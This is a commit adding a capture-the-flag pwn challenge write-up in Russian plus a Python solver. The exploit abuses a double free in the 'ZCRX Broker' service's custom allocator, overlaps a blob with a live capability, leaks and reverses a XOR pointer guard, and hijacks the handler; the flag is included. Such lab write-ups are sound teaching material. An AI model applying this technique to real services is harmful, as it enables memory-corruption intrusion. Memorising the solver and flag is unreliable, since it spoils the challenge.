Init. Commit

This commit is contained in:
Caplag
2026-09-17 00:50:07 +03:00
commit 880d8698d6
115 changed files with 7611 additions and 0 deletions
+41
View File
@@ -0,0 +1,41 @@
<h1 align="center">ZCRX Broker</h1>
<p align="center">
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
<img src="https://img.shields.io/badge/difficulty-hard-critical" alt="hard"/>
</p>
ZCRX Broker управляет буферами приёма без копирования. В раздатке есть ELF `zcrx-broker` без PIE. У сервиса собственный пул памяти. Два отложенных события могут вернуть один блок в список свободных дважды. Добиваемся выделения одного адреса двум объектам. Тогда запись в новый blob изменит поля действующего объекта прав.
## Решение
Создаём `niov view` через пункт `1`, label любой. Новый view имеет `refs = 1`. Для view `0` дважды вызываем `2) arm lifecycle event`: сначала путь `scrub`, затем `refill`. Оба события запоминают одно и то же состояние с одной ссылкой.
В обоих снимках счётчик ссылок равен единице. Поэтому при выборе `3) drain lifecycle events` сервис обрабатывает оба события и дважды возвращает один и тот же блок в пул. В списке свободных теперь две записи с одним адресом — **double free в самописном аллокаторе**.
Выделяем capability через пункт `4`: она занимает первую запись. Вторую пока оставляем в пуле. У capability есть закодированный обработчик, который можно прочитать через `5) inspect capability`, cap `0`. Значение `encoded_handler` сохраняем числом в `encoded_audit`.
Обработчик по умолчанию — `audit_handler`, кодирование — XOR с pointer guard. Адреса функций берём из `readelf -sW public/zcrx-broker`, поскольку PIE выключен. Восстанавливаем guard и кодируем адрес экспорта:
```python
ptr_guard = encoded_audit ^ audit_handler
encoded_export = export_handler ^ ptr_guard
```
Пункт `6) allocate blob` заберёт вторую запись того же блока. Blob и живая capability окажутся в одной памяти. Сначала готовим 176-байтную подделку.
```python
import struct
payload = struct.pack("<QQQ", 0x4341505245433031, encoded_export, 0x4558504f52542121)
payload += b"/broker/export\x00".ljust(48, b"\x00")
payload = payload.ljust(176, b"\x00")
```
Выбираем `6) allocate blob`, на запрос `blob bytes:` отправляем строку `176`, затем на `blob payload:` передаём payload без добавленного перевода строки. Его поля задают `magic`, `encoded_handler`, `rights` и нуль-терминированный путь. Пункт `7) commit capability`, cap `0`, декодирует обработчик тем же guard. Проверки проходят, управление уходит в `export_handler`, и сервис печатает флаг.
[Солвер](solve/solve.py).
## Флаг
`caplag{double_returned_niov_shared_the_capability}`
+135
View File
@@ -0,0 +1,135 @@
#!/usr/bin/env python3
import argparse
import os
import socket
import struct
import subprocess
import sys
CAP_MAGIC = 0x4341505245433031
RIGHT_EXPORT = 0x4558504F52542121
CHUNK_SIZE = 176
class Tube:
def __init__(self, sock=None, proc=None):
self.sock = sock
self.proc = proc
def recv(self, n=4096):
if self.sock:
return self.sock.recv(n)
return os.read(self.proc.stdout.fileno(), n)
def send(self, data):
if self.sock:
self.sock.sendall(data)
else:
os.write(self.proc.stdin.fileno(), data)
def sendline(self, data):
self.send(data + b"\n")
def recvuntil(self, marker):
out = b""
while marker not in out:
chunk = self.recv(1)
if not chunk:
raise EOFError(out)
out += chunk
return out
def symbol_value(binary, name):
out = subprocess.check_output(["readelf", "-sW", binary], text=True)
for line in out.splitlines():
fields = line.split()
if len(fields) >= 8 and fields[-1] == name:
return int(fields[1], 16)
raise RuntimeError(f"symbol not found: {name}")
def connect(args):
if args.local:
env = os.environ.copy()
env["CTF_FLAG"] = args.flag
proc = subprocess.Popen(
[args.binary],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
)
return Tube(proc=proc)
sock = socket.create_connection((args.host, args.port), timeout=5)
return Tube(sock=sock)
def choose(io, value):
io.recvuntil(b">")
io.sendline(str(value).encode())
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--host", default="127.0.0.1")
parser.add_argument("--port", type=int, default=31339)
parser.add_argument("--local", action="store_true")
parser.add_argument("--binary", default="../public/zcrx-broker")
parser.add_argument("--flag", default="caplag{double_returned_niov_shared_the_capability}")
args = parser.parse_args()
audit_handler = symbol_value(args.binary, "audit_handler")
export_handler = symbol_value(args.binary, "export_handler")
io = connect(args)
choose(io, 1)
io.recvuntil(b"label:")
io.sendline(b"rx-preview-niov")
for path in (b"scrub", b"refill"):
choose(io, 2)
io.recvuntil(b"path:")
io.sendline(path)
io.recvuntil(b"view:")
io.sendline(b"0")
choose(io, 3)
io.recvuntil(b"free_count=")
io.recvuntil(b"\n")
choose(io, 4)
io.recvuntil(b"cap 0 allocated")
choose(io, 5)
io.recvuntil(b"cap:")
io.sendline(b"0")
io.recvuntil(b"encoded_handler=")
encoded_audit = int(io.recvuntil(b" rights=")[: -len(b" rights=")], 16)
ptr_guard = encoded_audit ^ audit_handler
encoded_export = export_handler ^ ptr_guard
forged = struct.pack("<Q", CAP_MAGIC)
forged += struct.pack("<Q", encoded_export)
forged += struct.pack("<Q", RIGHT_EXPORT)
forged += b"/broker/export\x00".ljust(48, b"\x00")
forged += b"overlap from double-returned niov".ljust(104, b"\x00")
forged = forged.ljust(CHUNK_SIZE, b"\x00")
choose(io, 6)
io.recvuntil(b"blob bytes:")
io.sendline(str(len(forged)).encode())
io.recvuntil(b"blob payload:")
io.send(forged)
choose(io, 7)
io.recvuntil(b"cap:")
io.sendline(b"0")
data = io.recvuntil(b"}")
flag = data[data.rfind(b"caplag{") :].decode()
print(flag)
if __name__ == "__main__":
sys.exit(main())